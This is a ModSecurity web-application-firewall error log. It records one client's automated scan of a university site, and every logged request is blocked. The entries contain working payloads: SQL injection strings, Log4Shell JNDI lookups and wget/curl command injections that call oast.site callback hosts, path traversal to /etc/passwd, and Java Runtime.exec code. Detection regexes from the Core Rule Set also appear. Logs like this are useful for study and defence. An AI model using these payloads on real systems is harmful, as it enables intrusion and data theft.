[Tue Aug 29 11:30:41.869540 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10ccCo-f0AAAPDnzcAAAAP"]
[Tue Aug 29 11:30:42.596164 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10csCo-f0AAAPDnzwAAAAP"]
[Tue Aug 29 11:30:43.307944 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10c8Co-f0AAAPQkgUAAAAe"]
[Tue Aug 29 11:30:43.395506 2023] [:error] [pid 1010] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlgaz4h3igjxaiji.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10c8Co-f0AAAPyOFUAAAAR"]
[Tue Aug 29 11:30:44.420038 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dMCo-f0AAAOKNqEAAAAK"]
[Tue Aug 29 11:30:45.412653 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dcCo-f0AAAPRNcYAAAAf"]
[Tue Aug 29 11:30:47.375579 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10d8Co-f0AAAPiBiwAAAAB"]
[Tue Aug 29 11:30:47.376354 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10d8Co-f0AAAPv-HMAAAAM"]
[Tue Aug 29 11:30:47.379742 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10d8Co-f0AAAPDn0gAAAAP"]
[Tue Aug 29 11:30:48.318077 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/"] [unique_id "ZO10eMCo-f0AAAN@5AAAAAAO"]
[Tue Aug 29 11:30:48.345474 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlghsjsbg4wzihb1.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10eMCo-f0AAAPQkhcAAAAe"]
[Tue Aug 29 11:30:48.365266 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10eMCo-f0AAAPPSxsAAAAd"]
[Tue Aug 29 11:30:50.376700 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10esCo-f0AAAO879AAAAAF"]
[Tue Aug 29 11:30:51.372979 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10e8Co-f0AAAPQkhsAAAAe"]
[Tue Aug 29 11:30:51.373281 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlg4r88be8ap5eiz.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10e8Co-f0AAAPOhbgAAAAa"]
[Tue Aug 29 11:30:51.395071 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10e8Co-f0AAAPQkhwAAAAe"]
[Tue Aug 29 11:30:52.331479 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO10fMCo-f0AAAPpWfcAAAAI"]
[Tue Aug 29 11:30:52.337584 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fMCo-f0AAAO879gAAAAF"]
[Tue Aug 29 11:30:53.302843 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fcCo-f0AAAOM4aIAAAAU"]
[Tue Aug 29 11:30:53.529103 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/account"] [unique_id "ZO10fcCo-f0AAAOM4acAAAAU"]
[Tue Aug 29 11:30:54.437145 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/account"] [unique_id "ZO10fsCo-f0AAAPMmEUAAAAY"]
[Tue Aug 29 11:30:54.562406 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO10fsCo-f0AAAPPSzIAAAAd"]
[Tue Aug 29 11:30:55.307415 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10f8Co-f0AAAPPSzMAAAAd"]
[Tue Aug 29 11:30:55.370495 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10f8Co-f0AAAOKNskAAAAK"]
[Tue Aug 29 11:30:56.323121 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gMCo-f0AAAO87@sAAAAF"]
[Tue Aug 29 11:30:56.376279 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gMCo-f0AAAPDn2oAAAAP"]
[Tue Aug 29 11:30:58.515245 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAP05IMAAAAA"]
[Tue Aug 29 11:30:58.543741 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10gsCo-f0AAAPOhdcAAAAa"]
[Tue Aug 29 11:30:59.379367 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlg8aaw7i6zwqjjb.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10g8Co-f0AAAOM4b8AAAAU"]
[Tue Aug 29 11:31:00.315674 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10hMCo-f0AAAPDn3sAAAAP"]
